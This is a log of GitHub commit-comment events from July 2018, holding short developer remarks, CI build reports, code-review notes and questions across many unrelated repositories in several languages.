{"id":"7926787397","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29616464,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-06T04:32:49Z","updated_at":"2018-07-06T04:32:49Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1676 of 1676 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.33%25-green.png)</a>\n"}},"created_at":"2018-07-06T04:32:49Z"}
{"id":"7926790115","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29616466,"position":14,"line":13,"path":"src/views/animation.html","commit_id":"50640ead2bfad9ae35e240686d4263994389846f","created_at":"2018-07-06T04:34:07Z","updated_at":"2018-07-06T04:34:07Z","author_association":"CONTRIBUTOR","body":"選擇器可用 `document.querySelector('.close')`\r\n參數的用法和 css 選擇器一樣"}},"created_at":"2018-07-06T04:34:07Z"}
{"id":"7926790780","type":"CommitCommentEvent","actor":{"login":"CanadianCommander"},"repo":{"name":"CanadianCommander/csc461_project"},"payload":{"comment":{"id":29616468,"position":null,"line":null,"path":null,"commit_id":"d1c8bbdeb36e515b0f0888e48d19e7b9c937511f","created_at":"2018-07-06T04:34:26Z","updated_at":"2018-07-06T04:34:26Z","author_association":"OWNER","body":"header files where removed in these commits bab3194a11d64ae21ca693fbd3f7891ba7726b0b and dbc9a1e26f7361564e428227488555afcb70c943 now added back."}},"created_at":"2018-07-06T04:34:26Z"}
{"id":"7926792769","type":"CommitCommentEvent","actor":{"login":"SathusanK"},"repo":{"name":"SathusanK/SaintRedditBot"},"payload":{"comment":{"id":29616471,"position":null,"line":null,"path":null,"commit_id":"efe4358ab73cd64c9fd1c4735eec08f8250a1406","created_at":"2018-07-06T04:35:26Z","updated_at":"2018-07-06T04:35:26Z","author_association":"OWNER","body":"Not actually a general file mod. This is to prepare for the pickle implementation."}},"created_at":"2018-07-06T04:35:26Z"}
{"id":"7926792836","type":"CommitCommentEvent","actor":{"login":"ajangn"},"repo":{"name":"executeautomation/EmployeeWindowsApp"},"payload":{"comment":{"id":29616472,"position":null,"line":null,"path":null,"commit_id":"a188f76d737ac6fed4accba6a1e3f1a4be5a50e2","created_at":"2018-07-06T04:35:28Z","updated_at":"2018-07-06T04:35:28Z","author_association":"NONE","body":"Hi, i ran the script and created my DB but with no Data in it, how do i get data?"}},"created_at":"2018-07-06T04:35:28Z"}
{"id":"7926794536","type":"CommitCommentEvent","actor":{"login":"taitokobayashi"},"repo":{"name":"sumikaishikawa/sakety"},"payload":{"comment":{"id":29616476,"position":5,"line":25,"path":"resources/views/welcome.blade.php","commit_id":"0e9d4cd33be5ed615808c8a3ba728f13c579514d","created_at":"2018-07-06T04:36:18Z","updated_at":"2018-07-06T04:36:18Z","author_association":"COLLABORATOR","body":"ここ直したよ！"}},"created_at":"2018-07-06T04:36:18Z"}
{"id":"7926803933","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29616483,"position":14,"line":13,"path":"src/views/animation.html","commit_id":"50640ead2bfad9ae35e240686d4263994389846f","created_at":"2018-07-06T04:40:41Z","updated_at":"2018-07-06T04:40:41Z","author_association":"CONTRIBUTOR","body":"另外如果資料是一個 list 的話，例如用 `getElementsByClassName()`，通常取變數會用 closeBtns 或是 closeBtnList 這兩種方式"}},"created_at":"2018-07-06T04:40:41Z"}
{"id":"7926804383","type":"CommitCommentEvent","actor":{"login":"tuxun"},"repo":{"name":"JacquesLucke/animation_nodes"},"payload":{"comment":{"id":29616485,"position":null,"line":null,"path":null,"commit_id":"2563c5374efbe92482ec6bc798528a3043f7de13","created_at":"2018-07-06T04:40:52Z","updated_at":"2018-07-06T04:40:52Z","author_association":"NONE","body":"seems to be compilable under python 3.6 for blender 2.79b (ubuntu 18.04). i added --noversioncheck to the setup script and it worked. PS: i really didnt know where to post"}},"created_at":"2018-07-06T04:40:52Z"}
{"id":"7926804612","type":"CommitCommentEvent","actor":{"login":"ldonald067"},"repo":{"name":"ldonald067/bloc-jams-jquery"},"payload":{"comment":{"id":29616486,"position":null,"line":null,"path":null,"commit_id":"d7a1e5f6ad7b11f4a3df6124d51040279fd1587b","created_at":"2018-07-06T04:40:59Z","updated_at":"2018-07-06T04:40:59Z","author_association":"OWNER","body":"For frontend intensive checkpoint 11"}},"created_at":"2018-07-06T04:40:59Z"}
{"id":"7926805433","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"JerryTsang/android_kernel_sharp_msm8974"},"payload":{"comment":{"id":29616489,"position":null,"line":null,"path":null,"commit_id":"c2ba89c6b256cc21ae077888e3248121a5789cb3","created_at":"2018-07-06T04:41:23Z","updated_at":"2018-07-06T04:41:23Z","author_association":"NONE","body":"话说你还在整pa23吗。。。"}},"created_at":"2018-07-06T04:41:23Z"}
{"id":"7926809445","type":"CommitCommentEvent","actor":{"login":"kumardosala"},"repo":{"name":"kumardosala/hello-world"},"payload":{"comment":{"id":29616495,"position":null,"line":null,"path":null,"commit_id":"3e15ae9e190c19ba64533cd2e52835577a4d3d68","created_at":"2018-07-06T04:43:21Z","updated_at":"2018-07-06T04:43:21Z","author_association":"OWNER","body":"fhxfgjfgzjh"}},"created_at":"2018-07-06T04:43:21Z"}
{"id":"7926817638","type":"CommitCommentEvent","actor":{"login":"Etaglibash"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29616507,"position":null,"line":null,"path":null,"commit_id":"03663c40a46309ba9cb50ed8b328d55764b17043","created_at":"2018-07-06T04:47:01Z","updated_at":"2018-07-06T04:47:01Z","author_association":"CONTRIBUTOR","body":"Sí. Yo reviso todo en la práctica, en el juego mismo. Ya sé que es el formato viejo pero el juego lo acepta sin problemas."}},"created_at":"2018-07-06T04:47:01Z"}
{"id":"7926817936","type":"CommitCommentEvent","actor":{"login":"ddt-sawa"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29616511,"position":null,"line":null,"path":null,"commit_id":"729cc5030aa7eb762fbebaaa1c8e3f172abb2c74","created_at":"2018-07-06T04:47:09Z","updated_at":"2018-07-06T04:47:09Z","author_association":"OWNER","body":"また、変数の名前に付ける英単語を間違えてvaliableにしてしまっていたのですが、3-15からvariableに修正しています。たびたび申し訳ございません。"}},"created_at":"2018-07-06T04:47:09Z"}
{"id":"7926820638","type":"CommitCommentEvent","actor":{"login":"james-jose"},"repo":{"name":"james-jose/ServiceNow-SMTP-SR"},"payload":{"comment":{"id":29616514,"position":null,"line":null,"path":null,"commit_id":"c87b635695fee8e3b41e5c8666969ffa9ba0758c","created_at":"2018-07-06T04:48:22Z","updated_at":"2018-07-06T04:48:22Z","author_association":"OWNER","body":"SB-66, SB-100"}},"created_at":"2018-07-06T04:48:22Z"}
{"id":"7926827108","type":"CommitCommentEvent","actor":{"login":"davidlira94"},"repo":{"name":"airbnb/lottie-android"},"payload":{"comment":{"id":29616525,"position":null,"line":null,"path":null,"commit_id":"0ccaba54f146c0b2b3371d45c62e8bc03be64b6d","created_at":"2018-07-06T04:51:18Z","updated_at":"2018-07-06T04:51:18Z","author_association":"NONE","body":"hello!, i have a question, does the 2.5.6 support the AndroidX version and Material.Design 2.0 from google? thanks a lot!"}},"created_at":"2018-07-06T04:51:18Z"}
{"id":"7926827317","type":"CommitCommentEvent","actor":{"login":"johnstultz-work"},"repo":{"name":"torvalds/linux"},"payload":{"comment":{"id":29616527,"position":30,"line":30,"path":"Documentation/timers/timekeeping.txt","commit_id":"7806f60e1d205db46eca6ad24429b3f86eda2588","created_at":"2018-07-06T04:51:23Z","updated_at":"2018-07-06T04:51:23Z","author_association":"CONTRIBUTOR","body":"Github isn't the best review system for the kernel, but yes, I think you're right the parens are in the wrong place. Feel free to submit a patch to me and cc lkml. See Documentation/process/submitting-patches.rst for more:\r\n  https://github.com/torvalds/linux/blob/master/Documentation/process/submitting-patches.rst"}},"created_at":"2018-07-06T04:51:23Z"}
{"id":"7926830201","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29616530,"position":null,"line":null,"path":null,"commit_id":"bfb5e7670bf35b0559472163134c37a5363468bd","created_at":"2018-07-06T04:52:44Z","updated_at":"2018-07-06T04:52:44Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - i386-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfb5e7670bf35b0559472163134c37a5363468bd-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfb5e7670bf35b0559472163134c37a5363468bd-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T04:52:44Z"}
{"id":"7926834162","type":"CommitCommentEvent","actor":{"login":"dongming33333"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29616533,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-06T04:54:31Z","updated_at":"2018-07-06T04:54:31Z","author_association":"NONE","body":"我已经下载钱包并导入离线账户，按照步骤操作。在EOS的空投币如何交易？试了试但是失败了"}},"created_at":"2018-07-06T04:54:31Z"}
{"id":"7926835982","type":"CommitCommentEvent","actor":{"login":"dongming33333"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29616538,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-06T04:55:22Z","updated_at":"2018-07-06T04:55:22Z","author_association":"NONE","body":"期盼您的回复，thank u"}},"created_at":"2018-07-06T04:55:22Z"}
{"id":"7926841738","type":"CommitCommentEvent","actor":{"login":"wangtianxing1010"},"repo":{"name":"helloflask/timer"},"payload":{"comment":{"id":29616544,"position":41,"line":39,"path":"templates/index.html","commit_id":"956381fcc21d04a0e3ab78d113c58dc983ca7062","created_at":"2018-07-06T04:58:03Z","updated_at":"2018-07-06T04:58:03Z","author_association":"NONE","body":"How did this show the timer on page? I only have a blank area."}},"created_at":"2018-07-06T04:58:03Z"}
{"id":"7926843728","type":"CommitCommentEvent","actor":{"login":"Senglin75"},"repo":{"name":"Senglin75/Senglin75.GitHub.io"},"payload":{"comment":{"id":29616546,"position":null,"line":null,"path":null,"commit_id":"5a511c2b0a7aa053a87757b4670b76900ae652ff","created_at":"2018-07-06T04:58:57Z","updated_at":"2018-07-06T04:58:57Z","author_association":"OWNER","body":"Python 中的排序函数 sorted()"}},"created_at":"2018-07-06T04:58:57Z"}
{"id":"7926848829","type":"CommitCommentEvent","actor":{"login":"yguedidi"},"repo":{"name":"facebook/php-graph-sdk"},"payload":{"comment":{"id":29616564,"position":null,"line":null,"path":null,"commit_id":"4a1c99fc2f2d263ca6cc6c8707788e1046568290","created_at":"2018-07-06T05:01:00Z","updated_at":"2018-07-06T05:01:00Z","author_association":"COLLABORATOR","body":"I agree! BTW, @SammyK can you please always use PRs to introduce changes to the SDK? :)"}},"created_at":"2018-07-06T05:01:00Z"}
{"id":"7926852147","type":"CommitCommentEvent","actor":{"login":"micahalcorn"},"repo":{"name":"OriginProtocol/origin-js"},"payload":{"comment":{"id":29616575,"position":null,"line":null,"path":null,"commit_id":"dbf76475c13a0aa762ab99af0fbc34f2c59013e9","created_at":"2018-07-06T05:02:27Z","updated_at":"2018-07-06T05:02:27Z","author_association":"MEMBER","body":"Accidental push 😇 "}},"created_at":"2018-07-06T05:02:27Z"}
{"id":"7926861120","type":"CommitCommentEvent","actor":{"login":"adramm2017"},"repo":{"name":"adramm2017/atividade"},"payload":{"comment":{"id":29616595,"position":null,"line":null,"path":null,"commit_id":"505c05ee51fe9db4d525bad64a003e5c2fd8170c","created_at":"2018-07-06T05:06:24Z","updated_at":"2018-07-06T05:06:24Z","author_association":"OWNER","body":"FIX alterada as letras de minúscula para maiúsculas"}},"created_at":"2018-07-06T05:06:24Z"}
{"id":"7926861239","type":"CommitCommentEvent","actor":{"login":"wsdfz"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29616596,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-06T05:06:27Z","updated_at":"2018-07-06T05:06:27Z","author_association":"CONTRIBUTOR","body":"选中要接受空投的帐号，必须是 初始帐号，然后在 交易 里面，点 EVR空投，再点 确定 即可。\r\n"}},"created_at":"2018-07-06T05:06:27Z"}
{"id":"7926869159","type":"CommitCommentEvent","actor":{"login":"chiraagChakravarthy"},"repo":{"name":"chiraagChakravarthy/Circle-Fighter"},"payload":{"comment":{"id":29616610,"position":null,"line":null,"path":null,"commit_id":"ddb94008e71c43dabec6f53d8dfc95372ac5555a","created_at":"2018-07-06T05:09:52Z","updated_at":"2018-07-06T05:09:52Z","author_association":"OWNER","body":"Theres alot of repetitive, redundant code. Ima fix that tommorow"}},"created_at":"2018-07-06T05:09:52Z"}
{"id":"7926872882","type":"CommitCommentEvent","actor":{"login":"soulox"},"repo":{"name":"JasonZigelbaum/HTML5-Canvas-Image-Transitions"},"payload":{"comment":{"id":29616614,"position":7,"line":7,"path":"js/anim_lib.js","commit_id":"4f43f579e244acfdc3964a7d13bf6f76746f1b27","created_at":"2018-07-06T05:11:23Z","updated_at":"2018-07-06T05:11:23Z","author_association":"NONE","body":"fix"}},"created_at":"2018-07-06T05:11:23Z"}
{"id":"7926875944","type":"CommitCommentEvent","actor":{"login":"ssarkarhyd"},"repo":{"name":"ssarkarhyd/Documents"},"payload":{"comment":{"id":29616621,"position":null,"line":null,"path":null,"commit_id":"be6db9c937954ad9bfc16fc0c62fa96979200365","created_at":"2018-07-06T05:12:35Z","updated_at":"2018-07-06T05:12:35Z","author_association":"OWNER","body":"wtf"}},"created_at":"2018-07-06T05:12:35Z"}
{"id":"7926876565","type":"CommitCommentEvent","actor":{"login":"pigm"},"repo":{"name":"pigm/DelClima-xamarin.android"},"payload":{"comment":{"id":29616622,"position":null,"line":null,"path":null,"commit_id":"4fab23a70c5fb47f951d16fecf9d687c1e57b3b3","created_at":"2018-07-06T05:12:49Z","updated_at":"2018-07-06T05:12:49Z","author_association":"OWNER","body":"fix, se elimina file .bak"}},"created_at":"2018-07-06T05:12:49Z"}
{"id":"7926880554","type":"CommitCommentEvent","actor":{"login":"MajikalExplosions"},"repo":{"name":"kjoenth/To-Boldly-Go"},"payload":{"comment":{"id":29616626,"position":null,"line":null,"path":null,"commit_id":"57add43d62dd922731bc9c5f64aa9531ca4b72f4","created_at":"2018-07-06T05:14:33Z","updated_at":"2018-07-06T05:14:33Z","author_association":"NONE","body":"@seanth I just ported this section to Java; has anything changed?  The only change I can see is that all the comments with unused code are gone."}},"created_at":"2018-07-06T05:14:33Z"}
{"id":"7926883839","type":"CommitCommentEvent","actor":{"login":"june29"},"repo":{"name":"tsumichan/todo-app"},"payload":{"comment":{"id":29616637,"position":null,"line":null,"path":null,"commit_id":"cc3e4c0dea39fcbe70200b31675cdae0d62437e9","created_at":"2018-07-06T05:15:48Z","updated_at":"2018-07-06T05:15:48Z","author_association":"COLLABORATOR","body":"ここで\r\n\r\n```rb\r\nconfig.i18n.default_locale = :ja\r\n```\r\n\r\nの変更を止めたのはどうしてですか？ :smiley:\r\n"}},"created_at":"2018-07-06T05:15:48Z"}
{"id":"7926887448","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29616643,"position":null,"line":null,"path":null,"commit_id":"b0bf59fe5df3bbd7d201f39fcf096e54e9b0854c","created_at":"2018-07-06T05:17:23Z","updated_at":"2018-07-06T05:17:23Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das telas (Remoção de erros)](https://trello.com/c/imXGiTQq/198-refatora%C3%A7%C3%A3o-das-telas-remo%C3%A7%C3%A3o-de-erros)"}},"created_at":"2018-07-06T05:17:23Z"}
{"id":"7926888375","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29616645,"position":null,"line":null,"path":null,"commit_id":"ed9a7f206bf972721427f516271b2c800fbaad7a","created_at":"2018-07-06T05:17:47Z","updated_at":"2018-07-06T05:17:47Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das telas (Remoção de erros)](https://trello.com/c/imXGiTQq/198-refatora%C3%A7%C3%A3o-das-telas-remo%C3%A7%C3%A3o-de-erros)"}},"created_at":"2018-07-06T05:17:47Z"}
{"id":"7926888470","type":"CommitCommentEvent","actor":{"login":"chenchengfly"},"repo":{"name":"chenchengfly/test"},"payload":{"comment":{"id":29616646,"position":45,"line":45,"path":"str2float.py","commit_id":"602c63b7701c452525f7478f91d1df51f6290c91","created_at":"2018-07-06T05:17:49Z","updated_at":"2018-07-06T05:17:49Z","author_association":"OWNER","body":"##yes"}},"created_at":"2018-07-06T05:17:49Z"}
{"id":"7926888868","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29616648,"position":null,"line":null,"path":null,"commit_id":"cbeb1caab3a17c93da17dc6517289597099b2f0d","created_at":"2018-07-06T05:17:59Z","updated_at":"2018-07-06T05:17:59Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das telas (Remoção de erros)](https://trello.com/c/imXGiTQq/198-refatora%C3%A7%C3%A3o-das-telas-remo%C3%A7%C3%A3o-de-erros)"}},"created_at":"2018-07-06T05:17:59Z"}
{"id":"7926889978","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29616651,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-06T05:18:28Z","updated_at":"2018-07-06T05:18:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T05:18:28Z"}
{"id":"7926890063","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29616652,"position":null,"line":null,"path":null,"commit_id":"31a27412955a57b62882c58d74326afd908203f2","created_at":"2018-07-06T05:18:30Z","updated_at":"2018-07-06T05:18:30Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das telas (Remoção de erros)](https://trello.com/c/imXGiTQq/198-refatora%C3%A7%C3%A3o-das-telas-remo%C3%A7%C3%A3o-de-erros)"}},"created_at":"2018-07-06T05:18:30Z"}
{"id":"7926890744","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29616654,"position":null,"line":null,"path":null,"commit_id":"21f14f854b41880c8d1ca362bac3937e000d9a4a","created_at":"2018-07-06T05:18:48Z","updated_at":"2018-07-06T05:18:48Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das telas (Remoção de erros)](https://trello.com/c/imXGiTQq/198-refatora%C3%A7%C3%A3o-das-telas-remo%C3%A7%C3%A3o-de-erros)"}},"created_at":"2018-07-06T05:18:48Z"}
{"id":"7926892878","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29616655,"position":null,"line":null,"path":null,"commit_id":"714f58b055ef7adc0ec14e2b860a8cf2ac423467","created_at":"2018-07-06T05:19:42Z","updated_at":"2018-07-06T05:19:42Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das telas (Remoção de erros)](https://trello.com/c/imXGiTQq/198-refatora%C3%A7%C3%A3o-das-telas-remo%C3%A7%C3%A3o-de-erros)"}},"created_at":"2018-07-06T05:19:42Z"}
{"id":"7926893976","type":"CommitCommentEvent","actor":{"login":"imkitae"},"repo":{"name":"ridi/cms"},"payload":{"comment":{"id":29616658,"position":5,"line":51,"path":"src/Service/Auth/Authenticator/OAuth2Authenticator.php","commit_id":"33e87b918036658b43c4dcfbcaca06234e3c8a9d","created_at":"2018-07-06T05:20:11Z","updated_at":"2018-07-06T05:20:11Z","author_association":"COLLABORATOR","body":"state가 null이면 문제가 있는것 아닌가요?"}},"created_at":"2018-07-06T05:20:11Z"}
{"id":"7926894269","type":"CommitCommentEvent","actor":{"login":"eduard-bagdasaryan"},"repo":{"name":"measurement-factory/squid"},"payload":{"comment":{"id":29616660,"position":6,"line":341,"path":"src/store.cc","commit_id":"e4aab7b83d620f2f0d45f636848d619387ec7339","created_at":"2018-07-06T05:20:18Z","updated_at":"2018-07-06T05:20:18Z","author_association":"NONE","body":"> AFAICT, the only way removing the Packer parent can work\r\n\r\nEven this would not give us an advantage over old Packable inheritance, as you noted:\r\n* no memory benefit: anyway, we need to store a StoreEntryPacker pointer, though it is nil by default\r\n* no performance benefit, due to indirect calls of Packable (e.g., calling old e->append() through vtable now becomes e->packer()->append()->e->append()).\r\n"}},"created_at":"2018-07-06T05:20:18Z"}
{"id":"7926898702","type":"CommitCommentEvent","actor":{"login":"JDias"},"repo":{"name":"farribeiro/i-educar"},"payload":{"comment":{"id":29616663,"position":null,"line":null,"path":null,"commit_id":"f9c91a8953ed4496f4e8afe10c4e9900dd3ffb49","created_at":"2018-07-06T05:22:10Z","updated_at":"2018-07-06T05:22:10Z","author_association":"COLLABORATOR","body":"Fabio, segura ae...\r\neu não olhei esse arquivo com carinho.\r\n1o, acho que ele não está em utf8.\r\n2o, a linha 90 eu permiti, acho que é para negar\r\n\r\n\r\ndeixa eu olhar melhor!"}},"created_at":"2018-07-06T05:22:10Z"}
{"id":"7926898768","type":"CommitCommentEvent","actor":{"login":"VemalapalliVenkatesh"},"repo":{"name":"VemalapalliVenkatesh/ng2-charts"},"payload":{"comment":{"id":29616664,"position":null,"line":null,"path":null,"commit_id":"97ceb8fd5f738a764d871013bf294561e746c6da","created_at":"2018-07-06T05:22:12Z","updated_at":"2018-07-06T05:22:12Z","author_association":"OWNER","body":"Added image"}},"created_at":"2018-07-06T05:22:12Z"}
{"id":"7926899820","type":"CommitCommentEvent","actor":{"login":"Devgrapher"},"repo":{"name":"ridi/cms"},"payload":{"comment":{"id":29616666,"position":5,"line":51,"path":"src/Service/Auth/Authenticator/OAuth2Authenticator.php","commit_id":"33e87b918036658b43c4dcfbcaca06234e3c8a9d","created_at":"2018-07-06T05:22:37Z","updated_at":"2018-07-06T05:22:37Z","author_association":"CONTRIBUTOR","body":"네, 그경우에 type error 오류가 나는데 그거보다는 우리 로직에서 InvalidStateException 이 정상적으로 throw되게 변경했습니다."}},"created_at":"2018-07-06T05:22:37Z"}
{"id":"7926915274","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29616694,"position":null,"line":null,"path":null,"commit_id":"a92a121a5bc0df5b2f05c1d1a5c4658ed4084fae","created_at":"2018-07-06T05:29:01Z","updated_at":"2018-07-06T05:29:01Z","author_association":"MEMBER","body":">asks for a rebase\r\n>he pushes a revert commit\r\n\r\nGG. Now you have to rebase two commits out of it."}},"created_at":"2018-07-06T05:29:01Z"}
{"id":"7926916987","type":"CommitCommentEvent","actor":{"login":"idsb3t1"},"repo":{"name":"idsb3t1/UI-ys1int-KEEP-TC"},"payload":{"comment":{"id":29616698,"position":null,"line":null,"path":null,"commit_id":"1bebf109e8ef831319e00054159e4f43101c31b2","created_at":"2018-07-06T05:29:44Z","updated_at":"2018-07-06T05:29:44Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.stage1.bluemix.net/devops/toolchains/ee7af0c7-eb4b-4808-84ae-65a1ebf892f4?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\"): [Delivery Pipeline](https://console.stage1.bluemix.net/devops/pipelines/9602ba9a-db4c-42c8-81d1-69655e515efe?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\") deployed [UI-ys1int-KEEP-TC](https://github.com/idsb3t1/UI-ys1int-KEEP-TC/releases/tag/deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180706-052943 \"deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180706-052943\") to [dev](https://console.stage1.bluemix.net/apps/e0173942-fbb5-42df-a8ff-cca49f037241?env_id=ibm:ys1:us-south \"ibm:ys1:us-south:idsb3t2@us.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-06T05:29:44Z"}
{"id":"7926917239","type":"CommitCommentEvent","actor":{"login":"YoungHeartLife"},"repo":{"name":"YoungHeartLife/test2"},"payload":{"comment":{"id":29616699,"position":null,"line":null,"path":null,"commit_id":"82f8c609c955d3d7bde34b9f069b343297efe63b","created_at":"2018-07-06T05:29:51Z","updated_at":"2018-07-06T05:29:51Z","author_association":"OWNER","body":"dasdasdd"}},"created_at":"2018-07-06T05:29:51Z"}
{"id":"7926926042","type":"CommitCommentEvent","actor":{"login":"jangorecki"},"repo":{"name":"Rdatatable/data.table"},"payload":{"comment":{"id":29616712,"position":22,"line":193,"path":"src/frollR.c","commit_id":"da97afaf8fbb68f61ab5e2cfea650ccacd4307c3","created_at":"2018-07-06T05:33:20Z","updated_at":"2018-07-06T05:33:20Z","author_association":"MEMBER","body":"this can be tracked using `htop` and code below\r\n```r\r\n## use two layers of paralell processing\r\nn = 1e8\r\nd = as.data.table(list(1:n/2, n:1/4))\r\nfrollmean(d[,1], c(3000), exact=TRUE)\r\nfrollmean(d, c(3000, 4000), exact=TRUE)\r\n```"}},"created_at":"2018-07-06T05:33:20Z"}
{"id":"7926935793","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29616724,"position":null,"line":null,"path":null,"commit_id":"0cee6f01f010a6d0721f26652d41acb219adbd86","created_at":"2018-07-06T05:37:12Z","updated_at":"2018-07-06T05:37:12Z","author_association":"COLLABORATOR","body":"This wastes some space in the object file but it clears the warning:\r\n\r\n```\r\nosx:cryptopp$ nm ppc-simd.o\r\n000000000000018e S _PPC_SIMD_FNAME\r\n```"}},"created_at":"2018-07-06T05:37:12Z"}
{"id":"7926942423","type":"CommitCommentEvent","actor":{"login":"JerryTsang"},"repo":{"name":"JerryTsang/android_kernel_sharp_msm8974"},"payload":{"comment":{"id":29616734,"position":null,"line":null,"path":null,"commit_id":"c2ba89c6b256cc21ae077888e3248121a5789cb3","created_at":"2018-07-06T05:39:51Z","updated_at":"2018-07-06T05:39:51Z","author_association":"OWNER","body":"最近想整，有时间的话"}},"created_at":"2018-07-06T05:39:51Z"}
{"id":"7926943887","type":"CommitCommentEvent","actor":{"login":"locvfx"},"repo":{"name":"akaunting/akaunting"},"payload":{"comment":{"id":29616739,"position":null,"line":null,"path":null,"commit_id":"d0c6e327c1cc3ad07e96d9bdc80a4ee79a9d2f9c","created_at":"2018-07-06T05:40:24Z","updated_at":"2018-07-06T05:40:24Z","author_association":"NONE","body":"Thank you"}},"created_at":"2018-07-06T05:40:24Z"}
